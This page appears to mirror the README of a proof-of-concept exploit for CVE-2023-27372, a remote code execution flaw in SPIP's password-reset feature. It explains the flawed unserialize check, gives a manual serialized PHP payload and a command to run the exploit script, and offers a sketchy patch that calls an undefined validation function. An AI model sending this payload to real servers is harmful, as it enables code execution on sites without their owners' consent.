关联漏洞
描述
This is a PoC for CVE-2023-27372 and spawns a fully interactive shell.
介绍
### This is a proof of concept CVE-2023-27372 SPIP RCE vulnerability.
It's a deserilzation flaw which exploits the dangerous use of #ENV tag during the reset password feature `(spip.php?page=spip_pass)` within `/ecrire/balise/formulaire_.php` Specifically this line:
1. Syntax: python3 exploit.py -u http(s)://url.com
```php
function protege_champ($texte){
if (is_array($texte))
$texte = array_map('protege_champ',$texte);
else {
// ne pas corrompre une valeur serialize
if (preg_match(",^[abis]:\d+[:;],", $texte) AND unserialize($texte)!=false)
return $texte;
$texte = entites_html($texte);
$texte = str_replace("'","'",$texte);
}
return $texte;
}
```
The `protege_champ` function suffers from various flaws. The regular expression (RE) check used to validate the input is flawed and can be bypassed easily. The code calls the `unserialize()` function without proper validation, allowing the execution of arbitrary code. Manual exploitation can be performed extremely easily. For example, if we wanted to execute `phpinfo();` we can do:
```php
oubli=s:19:"<?phpinfo(); ?>";
```
If the server returns the expected out, it's vulnerable. How can we patch? Fairly simply actually. Below, I have wrote a basic patch:
```php
function protege_champ($texte) {
if (is_array($texte)) {
$texte = array_map('protege_champ', $texte);
} else {
if (!isValidInput($texte)) {
$texte = 'Malicious input detected';
} else {
$texte = entites_html($texte);
$texte = str_replace("'", "'", $texte);
}
}
return $texte;
}
```
The patched `protege_champ()` function includes input validation, sanitization, and handling of malicious input.
<a href=https://twitter.com/redboltsec>Twitter</a>
文件快照
[4.0K] /data/pocs/4f359282673ad6f60794730905bf844ca5fd8136
├── [4.7K] cve-2023-27372.py
├── [1.7K] README.md
└── [ 29] requirements.txt
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。